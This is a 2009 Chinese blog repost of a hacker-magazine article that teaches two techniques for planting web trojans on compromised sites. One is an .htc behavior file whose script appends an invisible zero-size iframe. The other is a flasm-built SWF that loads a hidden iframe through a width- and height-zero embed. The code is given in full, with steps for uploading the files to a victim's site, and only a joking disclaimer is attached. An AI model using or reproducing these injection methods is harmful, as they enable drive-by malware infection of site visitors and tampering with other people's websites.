挂马的两个新方法(11期黑客手册稿子)

2009年11月14日星期六 | | |

挂马的两个新方法
        lcx

这里只做技术讨论,不做具体危害的事。如果你要用我的方法去做,我也没办法,呵呵。关于挂马,基本上是在网页原来的代码里加载一个iframe。关于加载iframe,我以前的文章写过几种,这篇文章里再提两个新方法吧。

一、利用htc文件来加载iframe。
百度百科里对htc文件的解释为:从5.5版本开始,Internet Explorer(IE)开始支持Web 行为的概念。这些行为是由后缀名为.htc的脚本文件描述的,它们定义了一套方法和属性,程序员几乎可以把这些方法和属性应用到HTML页面上的任何元素上去。Web 行为是非常伟大的因为它们允许程序员把自定义的功能"连接"到现有的元素和控件,而不是必须让用户下载二进制文件(例如ActiveX 控件)来完成这个功能。Web 行为还是推荐的扩展IE对象模型和控件集的方法。微软在它的开发者站点上的DHTML 行为库栏目里提供了几个定制的Web行为。
这些专业的术语看看就头疼,我们看实际应用。先来看一下vbs写的hello.htc

<attach event="ondocumentready" ONEVENT="Hello()" />

<script language="VBScript">

Function Hello()
      MsgBox "Hello, World!"
End Function

</script>

我们再来写一个1.htm来调用,代码:

<html>
<body style="behavior: url(hello.htc)">
</body>
</html>

我们把hello.htc和1.htm放在同一个目录下,用ie执行1.htm就会成功弹出一个hello world对话框。如果用vbs来执行的话,中马的人只有ie用户了,用火狐的就漏掉了,我们改成js的,直接用1.htm加载新的hello.htc,新的代码为:

<attach event="ondocumentready" ONEVENT="hello()" />

<script>
function hello()
{
var O = document.createElement("iframe");
O.width = '0';
O.height = '0';
O.src="http://www.sohu.com";
ownerDocument.body.appendChild(O); //注意看,这里用的是ownerDocument,这是精华。
}
</script>

这样你把hello.htc传到对方网站目录下,然后在对方页面里加上<body style="behavior: url(hellow1.htc)">就可以成功加载框加了,呵呵。

二、关于swf加载网马的简便做法
用swf直接加载iframe也不是什么新方法了,不过我这里有一个简单做法,用到的软件就是flasm。我已经做好了一个模板,是swf.swf。我们在dos下运行flasm -d swf.swf>swf.flm,如图1所示。

图1

其中flasm -d swf.swf>swf.flm是生成swf.flm,如果不加>swf.flm是直接显示源码了。你只需要改变图1当中的url地址和框架高度就可以了。改变地址后,我们再运行一个命令:flasm -a swf.flm就生成你需要的swf了,如图2所示。

图2

我们再写一个swf.htm调用,代码为:

<head>
</head>
<body>
<embed src=swf.swf witdh=0 height=0></embed>
</body>

注意的是<embed src=swf.swf witdh=0 height=0></embed> 一定要加在body中间,要不然你不会成功,这是和我写的as代码有关。如果大家有什么疑问,可以去我的blog:http://hi.baidu.com/myvbscript


[文章中的文件1.htm、hello.htc以及swf.htm、swf.htc、flasm.rar已收录在本期光盘]

注:这里我做的flash样本没有提供,也没有什么了,大家主要看看htc的方法吧

 
我的QQ空间
Chi.mp - 免费顶级域名+免费博客+免费相册+免费邮箱-免费域名
  Chi.mp为注册会员提供yourname.mp免费顶级域名一个!Chi.mp...
 

0 评论:


所有文章收集于网络,如果有牵扯到版权问题请与本站站长联系。谢谢合作![email protected]